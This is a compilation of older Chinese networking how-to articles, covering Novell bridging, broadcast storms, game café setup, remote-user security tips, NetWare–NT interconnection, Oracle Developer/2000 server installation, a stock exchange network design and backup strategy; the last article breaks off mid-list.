    小区中心到楼宇之间的传输解决方案是接入系统最后一公里问题的核心，宽带综合信息缆（BIIC）的提出就是为解决光、电和控制信号的综合传输而研制的。首期使用的BIIC含两对光纤、两对馈电线、四对控制线。小区的配线概念图和示意图如图3。

返回


用网桥为Novell网提速

《一键清理系统垃圾》

用网桥为Novell网提速

   笔者曾为一所学校建立了一个教学网络系统，具体配置为：1服务器采用台湾宏基的Acer Altos 300、32MB内存、4.3GB硬盘、Pentium 200MHz CPU；2工作站共有90台，其中一台为有盘站，带一个1.44MB软驱和一个24速光驱，其余均为无盘工作站；36个16口Hub；4软件采用Novell Netware 3.12网络操作系统。整个系统采用星型总线拓扑结构，即主干线用细缆，局部用双绞线，如图1所示。
    该系统运行几天后发现，若90台微机同时上网工作的话，速度较慢，尤其是运行需反复读盘、存盘的软件时速度更慢。根据机房管理人员的要求，我们将网络做了改进，让文件服务器充当内部网桥，将90台工作站分成两个网段，分别连在服务器的两个网卡上，网络最终布局如图2所示。通过近一个星期的运行，发现工作站上网速度及复杂软件的运行速度都有所提高。笔者用自编的一个程序测试该系统，发现改进后的速度比改进前提高了近47％，完全能满足该学校网络教学的需要。具体改进步骤如下：
    1.在服务器中插入一块网卡，运行随卡附带的诊断配置程序。该学校服务器网卡均为AE2000 PnP，诊断程序为DIAG9008.EXE，在DOS状态下运行该程序，将此网卡的I/O Port设为320H，Int设置为4H，根据程序提示，保存配置退回到DOS状态并关机。
    2.将另外一块同型号的网卡(也可用不同型号的网卡，但其I/O Port和Int的默认值不能为320H和4H，否则，这块网卡也得用相应的诊断配置程序重新进行配置，避免与第一块网卡冲突)，也插在服务器的扩充槽中，启动服务器并进入控制台状态。
    3.执行Load install命令，编辑Autoexec.ncf文件。该文件应包含如下内容：
    File Server name STDN
    IPX Internal number 19980914
    Load ne2000 I/O Port=300 Int=3
    frame=ETHERNET_802.3 name=First
    Load ne2000 I/O Port=320 Int=4
    frame=ETHERNET_802.3 name=Second
    bind IPX First net=123
    bind IPX Second net=456
    Load monitor
    4.在原来网络的基础上，去掉一根细缆线，添加两个端接器，将90台工作站分为两个网段。以服务器的两个网卡引出两根双绞线，分别连入上述两个网段中。
    5.重新启动服务器后，整个网络就按改进后的新模式来运行。
    注：①修改网卡配置时，网卡所在微机不能上网，亦即只能在未调网卡驱动程序的情况下才能修改配置。
    ②如果走线方便的话，服务器可以通过带BNC口的网卡直接连在细缆上，效果会更好。


用知识扼杀网络风暴

《一键清理系统垃圾》

用知识扼杀网络风暴

    网络风暴是多少个网吧和多少个网管头疼的现象，他甚至成了以太网正常运行中的噩
梦，简单的说网络风暴就是大量的广播报文形成风暴似的数据量，占用了大量的带宽，大大
降低了整个以太网的通信性能。防止网络风暴的产生就得将他们有效的扼杀！废话不多说，
我开始了

    首先就是要说到咱们必须要用的网线和水晶头以及正确的做线方法，如果大家有在以太
网内复制大文件的经验，就会发现一些奇怪的现象，同样的文件在不同的计算机间复制都会
出现复制时间的不同，就算是同两台机器换用不同的线时间也会相差很多，当然除了网线的
原因还有计算机中的很多因素会影响你的测试数据，最垃圾的线就是在复制过程中提示“网
络资源不可用”了

    再有问个常识问题，为什么网线是八棵芯钱的。而且要双绞？其实网线只用四棵芯线就
可以完成数据传输了，如果你能回答出我这问题的话，相信你的网络应该也是健康的，如果
你答不上来，请往下看

    八棵芯钱而且要双绞，通俗的说就是防止网线传输的数据产生“串扰”，说白了就是网
线自己产生垃圾数据包，你网里的机器越多，这种包就越多，就算你网络流量不大，但是你
的网络状态是非常忙碌的，如果你网络通讯是大数量的，那么风暴就来啦！这种包就象游魂
野鬼一样在你的网络里游走，而且不断被网络抛弃又不断的从网络产生，但是这种包不但消
耗你的网络资源，而且CPU还会为丢弃这些垃圾包增加正常运算的开销。。。

    那么说了半天要怎么做呢？单单用好线和好头是不够的，(何况有人更不注意这点，还
用垃圾线和垃圾头。汗死)

    其实做线的方法除了要用标准的接法，双绞线的完全不绞合长度是影响一条线的重要指
标，反正俺们玩无盘的线要是不好的话，那这网就死定了，我个人成功案例很多，大部分都
是改网线使很多个网络正常运行，正确的标准是双绞线不绞合长度不能超过1.3厘米！还
有，如果没有电气干扰请千万不要用带屏蔽功能的水晶头，切记

    HUB和交换机这些就不用说了，这常识也够普通了，关于VLAN什么的也自己去研究吧，
有时网卡损坏也会产生网络风暴，这里也不做讨论了，下面再谈一下接入外网注意的事项

    有些网络在“ADSL”指示灯都正常的时候也会出现掉线，而且重新启动MODEM就好了。
这种情况多发生在没有做代理服务器，没有做放火墙或路由器的网络用户上面，这是为什么
呢？因为在ADSL MODEM上有个“10Base-T”口，这个口是接局域网的，实际上是个HUB口。
虽然是10M的端口，但是ADSL的上行带宽只有几百bit/s。如果用户局域网内部是ADSL直接接
HUB，HUB再接下面的客户机，网络内的许多与ADSL无关的数据包将占用ADSL上行通道，ADSL
也无法控制局域网内的广播风暴，如过超过ADSL上行传输能力，数据包将装入ADSL的缓存，
如果数据量继续增大，缓存溢出，造成ADSL“休眠”现象。这样只有重新启动MODEM了。解
决办法是资金不太雄厚的用户可以做一台双网卡的代理服务器（一定要双网卡），这样可以
隔断MODEM与局域网之间的直接通信，避免上述问题。大用户最好用专门的软件、硬件防火
墙或路由器（不包括几百元内的家用路由器,这种路由器也会出现“休眠”现象。）。

    还有内网的结构中不要有环路，由于网络中有环路存在，造成每一帧都在网络中重复广
播，引起了广播风暴。要消除这种网络循环连接带来的网络广播风暴可以使用STP协议，大
家可以查阅思科等相关的书籍，在这就不多说了。另外，以后我们在做比较大型的网络时，
一定要建立详细的档案，包括网络布线图、IP及MAC对应表等，并在网线上套数码管。

    最后还有注意一点就是网络交换机分布结构要遵守五四三规则，超越这个规则的话，你
的网一定正常不了.


游戏网吧的组建

《一键清理系统垃圾》

游戏网吧的组建

      电脑似乎是个“吸血鬼”，在一次次频繁的升级中把我们的血汗钱都吸光了，能不能“以机养机”，让电脑为我们谋点“钱”途呢？这里为你介绍一个非常适合电脑爱好者（特别是PC GAME玩家）做的生意——经营游戏网吧。借此既可结交各路英雄好汉，又可推广电脑知识，更可赚钱，不亦乐乎！
    一、网络篇
    联网游戏是游戏网吧最吸引人的地方，与人对战更是电脑游戏的魅力所在，不少“有机一族”就是在家里练好兵后再到游戏厅里找人厮杀的。
    游戏网吧的组建一般有两种解决方案，一种是组建基于Netware或NT下的无盘工作站，一种是建立对等网。目前有很多电脑公司都声称使用无盘工作站既省钱又好用，但根据我个人的实践经验，则始终认为无盘工作站并不适用于游戏厅。原因主要是：首先千万别以为无盘站省了硬盘，减少了投资，其实你也因此买了一台服务器，而一台服务器的钱足够买5～6个2.1G的硬盘了；其次无盘站运行Win95是个难题，即使做得到，大多数DOS下的游戏也玩不了；最致命的是万一服务器有点伤风感冒的话，那就只好关门大吉啦！
    对于网络拓朴结构，一般也有两种方案，一种是用同轴电缆连接成总线型结构；一种是使用双绞线通过HUB（集线器）连接成星型结构，后者比前者在管理和使用上都要灵活，但造价也高出不少；由于网吧一般都不超过十台工作站，所以总线型结构的缺点不太突出，而且还有成本低的优势，值得选用。
    二、硬件篇
    确定组网方案后，下一步就是购机了，购买什么样的机型不但关系到投资的大小，也关系到以后游戏网吧的经营运作，非常重要。
    一般来说不要购买超前的机型（除非你很有钱），应当选购目前市场上的主流产品，最好是价格已基本跌到底，同时在一两年内不至于被淘汰的机型。这种机型的CPU目前非K6－233莫属了，才700元多一点，用来玩游戏性能一流，已经足够应付市面上所有的游戏了，本人强烈推荐！而6X86MX－233虽然更便宜（只要500元左右），但却不太适合于玩游戏，特别是3D类游戏。Intel是昂贵的代名词，就不考虑了。
    以下介绍其他一些主要配件的选购，对于其中的品牌，纯属个人意见，仅供参考。
    主板：福扬VP3，1M Cache、支持AGP、83MHz基频，工艺精良，才500元，太超值了，很多游戏厅都选用它。
    硬盘：越大越好！在资金允许的范围内一定要尽量买大容量的，至少2.1G以上,游戏这东西是众口难调，什么样的游戏都有人玩，最好能一次装它几十个，否则以后你就要不断地装、删游戏，不累死才怪。
    显示卡：福扬9750（AGP、2X、4M）足以应付《古墓丽影》、《摩托英豪》等3D游戏，350元左右。如果资金不足那就先买个S3775吧，140元，凑合着用，等以后赚了钱再配“巫毒”。
    内存：32M SDRAM必不可少，200元左右。
    光驱：8速足矣，350元左右。为了节约开支不必每台机都装，有三分一机子装就够了，现在大多数光盘版的游戏都被人改成了硬盘版，尽量装硬盘版的吧，一来加快速度，二来也省了买光盘的钱（这时候你才知道一个“海量”的硬盘多重要！），而没有光驱的机子可以通过对等网非常方便地共享其他机器上的光驱，进行游戏更新。
    声卡：买最便宜的吧，游戏厅里十多对音箱一起响，谁听得出1000元与70元声卡的区别？“龙珠858”、“小提琴120”等都是70元而已。除了配有源小音箱外，还可以配上一对耳塞，免得深夜被人投诉。
    网卡：NE2000几乎是统一的选择，如果不打算用HUB（集线器），那就选个单口的吧，还能省点钱，70元左右。
    软驱：有一个备用就够了，主要用来装驱动程序和杀毒。
    显示器：大多数游戏厅都用二手彩显，可以节省很多钱，大约350～500元不等，但选购时要注意其分辨率，至少要能上800×600才行，否则有些游戏玩不了。
    另外你还得为每个CPU准备一个超大风扇，有些“骨灰级”的玩家可是要玩三天三夜的哦。再买上两三个游戏手柄吧，挺吸引人的。其他像同轴电缆、T头、终结器这些组网用的零碎也别忘了买呀。
    屈指一算，以上配置的机子大约是3500元/台，已经相当不错了。
    三、软件篇
    装好了硬件，就可以着手安装软件和网络了。首先是为每台机子装上Win95，安装好各种驱动程序（不用我再说了吧），注意声卡和光驱的驱动程序在DOS下也要进行安装；安装网卡，注意网卡在DOS下和Win95下都要安装成功，现在大多数的网卡都是P&P的，有些网卡在Win95下安装很顺利，但在DOS下运行IPX却找不到网卡，这时可以把P&P改为Jumperless，手动分配I/O地址，问题一般都能解决；然后在Win95下设置对等网和资源共享（关于Win95对等网的安装，《电脑报》第五期已有介绍，这里就不再赘述了。）一切完成后，你应该已经可以在DOS7.0下联网对战《毁灭公爵》和在Win95下联网玩《帝国时代》了。
    完成上述工作后，你的游戏厅仍不能开业，因为你的顾客很可能还是“电脑盲”，他可能找不到DOS下的游戏目录，也可能不知道如何启动Win95，于是你还需要制作一个游戏菜单。这样你的顾客一启动就可进入游戏菜单，通过菜单就可选择要玩的游戏了。这类菜单必须满足以下要求：首先是不能驻留内存，其次是不需要中文系统支持，另外最好能支持鼠标操作，这类菜单《电脑报配套光盘》上有几个，基本可以满足使用，如果还不满意，我这里有几个游戏厅专用的，可以与大家交流。我的E－mail为：jjing@zg169.net。
    四、游戏篇
    在此特别鸣谢“西屋”，因为大部分的钱都是《RA》给赚回来的，即时战略类游戏永远是游戏厅的热点，这类游戏层出不穷，《帝国时代》、《横扫千军》、《星际争霸》数也数不完（装也装不完）；其它如RPG类、战棋类、策略类、经营类、大富翁类的游戏都有人玩，总之是萝卜青菜各有所爱，每类都装些肯定没错。而如“电脑报－游戏排行榜”上的那些热门经典游戏就更不能少了，另外有些“文物级”的游戏千万别以为无人问津，我现在还看到很多游戏厅的机子在跑《大航海》呢，当然游戏的流行也有地域性，时刻留意本地区流行的游戏也是很重要的。
    一切搞定后，你的游戏网吧就可以开张大吉啦！至于经营之道，那就是八仙过海，各显神通啦！

返回


远程、移动用户连接网络十大法则

《一键清理系统垃圾》

远程、移动用户连接网络十大法则

    移动用户越来越多，安全成为重要挑战。

    远程用户、移动用户越来越多，通过过程访问程序及网络资源的需求越来越大，为此类用户的管理带来了安全挑战。这种连接为网络防护带来冲击，对企业而言还带来了财务风险，如果网络受到下一代红色代码或尼姆达类病毒的影响，会受到什么样的损失。以下十条法则对于有效管理移动用户的安全十分有效：

    1、扫描：通过宽带上网（DSL，家庭Cable,或WLAN)的用户可能受到扫描，包过滤的PC防火墙可以降低此风险，可以与网络已有的安全工具结合使用。

    2、蠕虫和病毒：反病毒软件也不能被滥用，对于静态的桌面用户，安装邮件检测已经足够了。但对于移动用户而言，访问WEB方式的邮件，而临新的风险，如果没有安装反病毒软件，一旦也企业网络连接可能会传播病毒。

    3、丢失笔记本电脑：如果笔记本电脑中的数据是有价值的，考虑磁盘加密或追踪软件，另外，为防止笔记本电脑可以欺骗网络认证，考虑加强的认证方式。使用黑客工具来获得笔记本电脑的用户名和密码是很容易的，为防止盗贼可以连入网络，考虑加密网络连接，确保VPN用户认证方式而不是机器认证。

    4、沉睡的木马，随时会受到要求而唤醒，而以将笔记本电脑变为发起拒绝服务式攻击的工具，使企业暴露在潜在的危险中。防火墙可以通过封堵相应端口堵住很多木马。

    5、安户/网关的VPN：VPN提供二项安全保障，传输时加密数据，认证连接的用户及机器，但不幸的是这使得笔记本更加成为进入网络途径之一的目标，所以分割传输通道，完善用户认证，严禁滥用。

    6、多重环境/多重策略：在安全策略中需要考虑移动用户的环境，通过合作ISP或自身的ISP用户可以VPN直接接入网络，所以对于用户的方位及接入方式要有严格的标准。

    7、操作系统：采用一个标准并坚持，配置一个强壮的win2000，关闭个人WEB服务和其他不必要的服务，打所有需要的补叮

    8、用户管理的安全：用户无法管理自己的安全，如果受到安全事件的警告，他们可以寻求帮助，也可以关闭安全程序，企业级的工具允许对普通用户透明的安全措施，而把策略定义留给网络专家。

    9、简单策略：最大的安全问题是配置错误的策略，要从安全工具获得最好的效果，选择通用的途径和熟悉的结构，经常升级并检查安全措施。

    10、警告或不警告：考虑发生安全问题时的支持和反应，如果受到扫描如何应对，数据是事值得收集？将不可见的费用通过收集监控数据纳入控制。最好的方法可能是应用独立的工具，反病毒软件可以隔离蠕虫，防火墙自动屏蔽有问题的端口，提供24＊7小时的监控和分析。

作者：
来源：天极网


多媒体网络教室方案

《一键清理系统垃圾》

多媒体网络教室方案

    在新世纪到来之际，如何改变传统教育观念和教学模式，充分利用校园网及交互式多媒体技术实现教育方法及教学手段的变革，是老师们共同关心的问题。根据我国国情，纯软件多媒体教学网以其优良的性能和低廉的价格逐渐成为学校网络教学的新宠。小哨兵纯软件多媒体教学网V2.0版采用新的压缩算法和高效内核技术，突破了传统网络教学系统在实际应用中的技术障碍和成本限制。该系统运行在当今流行的网络平台上，不需附加任何硬件设备。在充分利用现有资源的前提下，短时间、低成本地为您构建全新的网络教学系统。

    软、硬件组成

    1、硬件配置
    ＊服务器(可选)：PⅢ 450CPU，64M内存，10/100Mbps(RJ－45)自适应网卡；
    ＊教师机：P166CPU，32M内存，2.1G硬盘，10/100Mbps(RJ－45)自适应网卡，带全双工声卡、话筒、耳机或音箱；
    ＊学生机：P133CPU，16M内存，10/100Mbps(RJ－45)自适应网卡，带全双工声卡、耳机、话筒；
    ＊网络拓扑结构：采用与校园网连接的星型局域网，根据具体情况可选交换机及集线器。

    拓扑图
    2、软件方案
    ＊操作系统：Win95/98/2000或NT，网络协议为TCP/IP；
    ＊网络环境：Windows NT有盘或Win95无盘工作站；
    ＊教学平台：小哨兵纯软件多媒体教学网V2.0。

    独特功能

    1、上、下课切换 上课后教师可选择是否要求学生登录姓名或调出全班学生姓名，并可开始课堂计时或倒计时，也可将准备好的教案调出，使整堂课有条不紊、尽在教师掌握之中。
    2、网络教鞭 在做广播演示时，教师可根据课堂需求按Alt＋0或Alt＋1开启风格教鞭，并可选择任何界面（包括桌面或白板）做背景；工具条在屏幕的最上方，主要功能有板书、标注、各种线条及图形(包括矢量图)，可对重点内容进行划线标记，并伴有闪烁效果。
    3、快速选定 由于班级学生的增多，特别是在虚拟网络教室上课，教师往往对众多的学生难以管理和排列，利用“全班”及“1～8组”按钮，结合拖动排序可使教师轻松快速地选定任意一组。
    4、联网性能显示 纯软件多媒体教学网完全依靠网络传输数据，当数据流量突然加大时，很容易造成网络阻塞。而通过联网性能显示条可直观地看到学生机与网络联接的状态，起到预先示警的作用，使教师有所准备或改变方法，不至于突然出现问题令师生手足无措，影响教学质量。
    5、教学评估 网络教学作为全新的教学方式，教师采用后对教学效果不太清楚；而教学评估功能通过课堂即时提问，测验及趣味抢答相结合，采用加、减分的方式对每一位学生的课堂表现进行记录，最终可以真实地评估教学效果。
    6、远程桌面定制 教学过程中，学生误删除了重要程序或更改了网络配置造成死机、掉网等问题，浪费了本就有限的课堂时间，牵扯了教师很多精力。远程桌面定制功能使教师无论课上、课下都可对学生桌面的图标、控制面板、网络属性等进行远程权限管理，使学生安心上课，是提高教学质量的有效手段。

    怎么降低成本

    目前市场上的多媒体网络教室产品，不管是硬件版还是软件版，都是按照教室学生机数量报价的，比如40台学生机的教室报价多在12000元左右；也就是说构建教室的成本会随着学生机数量的增加而递增。
    从技术角度讲，用户数的增加，给程序带来的问题主要集中在带宽的分配、点对点通信的优化及掉网这三方面，一般通过繁琐的程序修改来解决，这就直接导致开发成本的升高。而小哨兵多媒体教学网V2.0很好地运用了流控制技术及Windows内核嵌入技术，有效地解决了用户数变化给程序带来的各种影响，大大降低了成本。不论学生机数有多少，定价均为8000元/套（不区分用户数），如果学生机数较多，并可能随着学校资金的充裕逐步更新，那么，不妨考虑这款产品，能够明显地降低教室构建成本。

返回


在Win NT平台上访问NetWare服务器

《一键清理系统垃圾》

在Win NT平台上访问NetWare服务器

    Novell公司的NetWare和Microsoft公司的Windows NT因其功能强大，性能稳定，都是目前应用中普遍选用的主流网络操作系统平台。在实际工作中，NetWare服务器一般侧重于文件服务和打印服务，而Windows NT往往充当业务系统数据库服务器，因此经常会遇到已登录Windows NT平台而又需要访问NetWare服务器并存取资源的情况。这实际上是一个异种操作系统主机互联的问题，本人是在Windows NT 4.0中文版和NetWare 4.0的环境下，通过下面几个步骤来解决二者互联问题的。

    第一步：在NetWare服务器建立用户

    首先，要在NetWare服务器上为Windows NT即将进行的访问建立用户帐号和用户密码，并为该用户分配相应的资源和权限。

    第二步：安装“NWLink IPX/SPX兼容传输”协议

    我们知道，计算机之间为了能实现互联，都必须遵守共同的网络通信协议。NetWare在网络层的通信协议是IPX/SPX，而Microsoft公司为了增强其Windows NT产品的适用性，实现Windows NT系统与NetWare系统通信，开发了NWLink 协议，它实际上是运行在Windows NT上的IPX/SPX协议。
    启动计算机，登录Windows NT操作系统，进入“控制面板”，利用其中的“网络”选件来安装NWLink协议，操作步骤如下：
    1．在“控制面板”窗口中双击“网络”图标，打开“网络”对话框。
    2．点中“协议”选项，再单击“添加”按钮，打开“选定网络协议”列表框。
    3．从“选定网络协议”列表框中选中“NWLink协议”，然后单击“确定”按钮。
    4．系统弹出“Windows NT安装程序”对话框，根据要求键入Windows NT 4.0中文版安装光盘所在路径，然后单击“继续”按钮。
    5．安装引导程序将所需的IPX通信协议及相关服务装入操作系统，这时，在“网络”对话框中已有了“NWLink IPX/SPX兼容传输协议”，点击“关闭”，退出安装。系统在进行多协议之间的绑定配置、存储、复查之后，提示用户重新启动计算机，新增的NWLink协议只有在计算机重新启动之后才能生效。

    第三步：安装“NetWare网关服务”

    Windows NT服务器在安装了NWLink协议之后，也仅仅是在网络层与NetWare实现了协议同步，但这两种网络操作系统在各自的共享文件访问的高层协议上有所不同，因此，还必须在Windows NT服务器上安装“NetWare网关服务”，才能解决共享文件访问协议之间不一致的问题，从而实现由Windows NT对NetWare系统的访问。
    我们再次进入“控制面板”，利用“网络”选件来安装NetWare网关服务，操作步骤如下：
    1．在“控制面板”窗口中双击“网络”图标，打开“网络”对话框。
    2．点中“服务”选项，再单击“添加”按钮，打开“选定网络服务”列表框。
    3．在“选定网络服务”列表框中点中“NetWare网关服务”，然后单击“确定”按钮。
    4．系统弹出“Windows NT安装程序”对话框，根据要求键入Windows NT 4.0中文版安装光盘所在路径，然后单击“继续”按钮，开始复制安装文件。
    5．复制文件结束后，回到“网络”对话框，“NetWare网关服务”选项出现在“网络服务”列表框中。
    6．单击“关闭”按钮，系统再次进行协议绑定配置、存储、复查。重新启动计算机，使新设置生效。
    7．启动后在Windows NT用户登录框出现之前，系统会弹出“NetWare（R）网络”的对话框，这是一个允许用户选择首选NetWare服务器的对话框。如果在此键入了首选服务器，并点击“确定”按钮，那么Windows NT在今后的每一次系统启动时，都会提示用户输入被选NetWare服务器的用户名和用户密码，直接与NetWare服务器连接；如果用户不打算设定首选服务器，也可点击“取消”按钮，以后可以通过“网上邻居”去访问NetWare网络。在上述对话框对首选服务器的设定与否，并不影响Windows NT对NetWare的访问，并且今后还可以在控制面板中再行设置，用户可以根据自己工作的实际情况加以选择。
    8．登录进入Windows NT后，可以发现在“控制面板”中多了一个“GSNW”的选件，这表明用户已经成功地安装了NetWare网关服务。

    第四步：连接NetWare服务器

    在正确地设置了网络协议和安装了NetWare网关服务之后，就可以连接NetWare服务器了，操作步骤如下：
    1．以Administrator或其它NT用户身份登录进入Windows NT。
    2．双击桌面上的"网上邻居"图标，打开“网上邻居”窗口；双击窗口中的“整个网络”图标，打开“整个网络”窗口；然后双击“NetWare或兼容网络”图标，就可以看到所有NetWare服务器；
    3．双击你想访问的NetWare服务器图标，系统弹出“输入网络密码”对话框，你只要输入已于第一步中在NetWare服务器上建立好的用户帐号和密码，然后点击“确定”按钮，就可以访问NetWare服务器为你分配好的资源了。
    补充说明：如果用户使用的是Novell公司NetWare 5.0以上的版本，由于该产品在NetWare 4.0的基础上又添加了许多新的功能，尤其是在网络协议支持的兼容性上有了较大的提高，因而可以关闭传统的IPX/SPX协议，以TCP/IP协议作为其网络协议，从而更加方便其它种类的操作系统与其互联。对于Windows NT，只要安装了TCP/IP协议，就可利用其FTP功能实现与NetWare服务器的文件级的信息传输。

返回


在网络服务器上安装Developer/2000

《一键清理系统垃圾》

在网络服务器上安装Developer/2000

      Developer/2000作为Oracle的Ｃlient/Server开发工具，一般安装在客户机上，如果能将Developer/2000安装在网络服务器（NOVELL NetWare或Windows NT）上，则Developer/2000可以被各客户机共享，不仅节约了客户机的磁盘空间，而且易于Developer/2000的管理和升级。本文简要介绍Developer/2000在网络服务器上的安装以及客户机的配置方法。

    一、 Developer/2000在服务器上的安装

    1．在服务器上，建立一个安装Developer/2000的目录，并设置该目录的属性，给使用Developer/2000的用户（组）授予读写权。
    2．映射网络驱动器。选择一台客户机，通过这台客户机把Developer/2000安装在服务器上。在这台客户机上，把服务器上用来安装Developer/2000的目录映射成一个网络驱动器，例如“O：”。
    3．安装Developer/2000。在上述客户机上，按照一般的安装过程安装Developer/2000，在选择安装目录时（Oracle Home），选择上述网络驱动器下的orawin，例如“O：\ORAWIN”。
    4．拷贝文件。Developer/2000安装并调试成功后，把一些客户机需要的文件拷贝到服务器上，供将来其他客户机拷贝使用。首先把Ｗindows目录下的配置文件ORACLE.INI、VSL.INI拷贝到服务器上的一个临时目录下。再把Ｗindows\System目录下的用于支持ＯＬＥ的文件（CTL3D.DLL、CTL3DV2.DLL、OLE2.DLL、OLE2PROX.DLL、OLE2DISP.DLL、OLE2NLS.DLL、COMPOBJ.DLL、OLE2CONV.DLL、STORAGE.DLL、TYPELIB.DLL、STDOLE.TLB、VSHARE.386)、用于支持Visual Basic的文件（MSOLEVBX.DLL、VBOA300.DLL）和用于支持Microsoft Foundation Class DLL的文件（MFC250.DLL、MFCD250.DLL、MFCO250.DLL、MFCOLEIU.DLL）也拷贝到服务器上的临时目录下。

    二、 客户机的配置

    上述用来安装服务器的客户机已经能够正常使用服务器上的Developer/2000了，其他客户机要想使用服务器上的Developer/2000，仅需做如下的配置即可。
    1．拷贝文件。将前述拷贝到服务器的配置文件ORACLE.INI、VSL.INI拷贝到该客户机的Ｗindows目录下，其他文件拷贝到Ｗindows\System目录下。
    2．修改Ｗindows目录下的win.ini，加入以下两行：
    [ORACLE]
    ORA_CONFIG=C:\Windows\Oracle.ini
    3．映射网络驱动器。把服务器上安装Developer/2000的目录映射成一个网络驱动器，映射的驱动器号最好与前述安装时一致，如果不一致，则修改该客户机的Oracle.ini,将其中的驱动器号修改成本机映射的网络驱动器号。
    4．建立菜单项（或快捷方式）。将常用的Developer/2000的应用（在服务器上Developer/2000目录\Orawin\Bin下）建立菜单项（或快捷方式），也可以从已安装的客户机上拷贝。

返回


证券交易所组网方案实例

《一键清理系统垃圾》

证券交易所组网方案实例

    我所在的国民信托投资有限公司是广州天河区的一个证券交易所，由于单位业务的迅猛发展，原有的小型证券交易系统无法满足目前日趋增长的需要，根据需要准备扩容成一个1000个点以上的新的大型证券交易系统。经过一段时间的努力，我们成功地对系统进行扩容。现把扩容过程提供如下，供大家参考。
    一、选择网络技术

    经过仔细分析，我们决定采用千兆交换以太网技术这是因为：
    1.如果1000个交易点每个点有0.1M的网络流量，那么在网络主干上将有1000×0.1M即100M的网络流量，100M的以太网刚好满足需要，但是，以太网的实际网络交换无法达到100％的利用，而且，如果以后再进行扩容或增加每个点的通信流量，100M的以太网主干也无法满足需要。在服务器的网卡和主干SWITCH之间、工作站和网络主干HUB之间将出现无法解决的网络瓶颈。
    2.目前基于PⅡ的服务器纷纷上马，300MHz～400MHz的强大数据处理能力无法迅速通过服务器的100M网卡将信息传输到网络主干，浪费了系统资源，加长了交易延迟时间。
    3.千兆以太网完全兼容最初的以太网规范的帧格式定义，支持CSMD/CD协议及全双工、流控制和IEEE 802.3标准。
    4.支持直接通过硬件实现虚拟网络管理。
    此外，采用千兆以太网可获得如下利益：
    1.可以得到10倍于100M快速以太网的带宽。
    2.原有的基于以太网的应用可以无缝地移植到千兆以太网。
    3.对以后的大流量、高速度的证券交易运作有充分的余量。
    4.消除了网络瓶颈，使通信畅通无阻。
    二、选择合作伙伴
    合作伙伴的选择是基于这样的考虑：
    1.产品线齐全。
    2.技术实力强，用户操心少。
    3.经验丰富，声誉好，值得信赖。
    经过多方比较和考虑，我们选择了广州正道科技有限公司。
    三、选择产品
    在网络主干中，网络产品均选用Intel的产品，其原因如下：
    1.交易所的大多数计算机主板的芯片都是Intel芯片，在数据处理的兼容性方面，Intel的网络产品和服务器及使用平台具有很好的兼容性。
    2.现在基于PCI 32位和64位的服务器总线都是Intel体系。通过Intel的网络产品可以更好地兼容和处理千兆以太网数据，保证服务器和网络主干的畅通。
    3.作为主干交换机的Intel GIGABIT以太SWITCH可以给全双工的所有端口提供12GPPS的交换速度。通过Intel Etherexpress Pro/1000网卡和550T SWITCH的千兆上联模块连接，可以提供2GB的交换连接。所有的端口均支持无间断线速度及完全交换功能，并且支持1024 IEEE 802.1 Q虚拟LAN，均内置了第三层网络交换和路由功能。
    4.集成有IP和IPX路由模块的Intel Express 550T SWITCH可以实现硬件级的分割网络，以降低网络的拥挤程度。它采用的容错系统可以最大限度地提高网络容错性。通过Intel Device View可以智能地实现远程和网络管理。
    5.提供安全可靠的高性能性价比。
    6.由于整个网络主干从1000M到100M都采用Intel的网络产品，在网络兼容性和可靠性方面，可以得到充分的保障。
    四、具体实现
    1.网络拓扑结构
    整个网络结构采用树型结构。
    (1)通过两个千兆交换机和6个百兆交换机组成千兆网一级交换主干；每3个百兆交换机以星型接法接入千兆交换机。每个服务器也以星型接法接入到千兆交换机中。
    (2)通过6个百兆交换机和42个百兆共享HUB组成网络二级交换。每7个HUB以星型接法接入到一个百兆交换机。
    (3)所有的工作站以星型接法接入到42个HUB中。
    整个网络形成一棵在顶端为千兆交换、中间为百兆交换、底层为百兆共享的树型结构的网络拓扑。
    2.产品选择
    (1)GB交换机采用Intel GIGABIT SWITCH。
    (2)百兆交换机采用Intel 550T SWITCH。
    (3)百兆共享HUB采用Intel Express 10/100 STACKABLE HUB。
    3.网络连接
    (1)三台服务器分别接入两块千兆光纤网卡，通过光纤跳线接入Intel千兆交换机。
    (2)两台千兆交换机之间没有物理连接。
    (3)6个Intel 550T通过本身的上联光纤模块利用光纤跳线接入Intel千兆交换机。
    (4)42个Intel Express 10/100 HUB通过双绞线接入6个Intel 550T交换机。
    (5)工作站通过双绞线分别接入Intel 10/100 HUB。

返回


证券系统有备无患

《一键清理系统垃圾》

证券系统有备无患

随着证券业越来越依赖于计算机，数据失效将会严重影响日常业务的正常运行，同时还将影响到整个企业的形象。一旦发生数据失效，最关键的问题就在于如何尽快恢复数据，使系统恢复正常运行。

■一、备份策略

要防止数据失效的发生，有多种途径，如加强建筑物安全措施、提高员工操作水平、购买品质优良的设备等，但最根本的方法还是建立完善的备份制度。

目前常采用的备份措施，在硬件一级有磁盘镜像、磁盘阵列、双机容错等；在软件一级有Standby、集群等技术。这些措施都属于热备份，即从逻辑意义上讲，系统中只存在一份数据（或一份数据的多份映象）。如果发生逻辑错误，这个错误就会立即被复制到所有的热备份数据中去。要避免这种现象的发生，只能采用冷备份的方式，即保留数据的多份历史纪录，也就是我们常说的磁带备份技术。

其实理想的备份系统是全方位、多层次的。一方面，要使用硬件备份来防止硬件故障；另一方面，如果由于软件故障或人为误操作造成了数据的逻辑损坏，则使用软件方式和手工方式结合的方法来恢复系统。这种结合方式构成了对系统的多级防护，不仅能够有效地防止物理损坏，还能够彻底防止逻辑损坏。

■二、选择备份系统软硬件

完整的备份方案对备份软、硬件的要求相当严格。在选择备份硬件时，应考虑备份的速度、备份介质的费用、备份数据的易保管性、备份硬件的可维护性等。在选择备份软件时，应考虑软件质量保证程度、软件对系统性能的影响、软件的可扩充性、软件的运行费用等。

1.备份硬件

备份硬件的选择，实际上就是备份介质的选择。只有选择了备份介质的种类，才能根据实际情况选择备份硬件。在选择备份介质时，要从可靠性、速度、费用、易保管性等方面综合考虑，目前被广泛采用的备份介质有磁带和MO两种。

如果选择MO作备份，其主要优点表现在MO是随机存储介质，在使用上接近日常习惯。但MO也有一些缺点：

1） MO的价格过高，达到200元/GB，仅次于硬盘；

2） MO容量有限，无法适应大量数据备份；

3） MO的理论寿命尚未经过实践检验，值得商榷；

4） MO的数据传输率为36MB/分，与其他备份介质相比没有明显优势。

在系统日益复杂、数据量日益增大的情况下，磁带是最理想的备份介质。用磁带备份主要有以下几个优点：

图1 宝鸡信托系统备份方式

1） 磁带技术的发展已有30多年时间，因此相当稳定可靠；

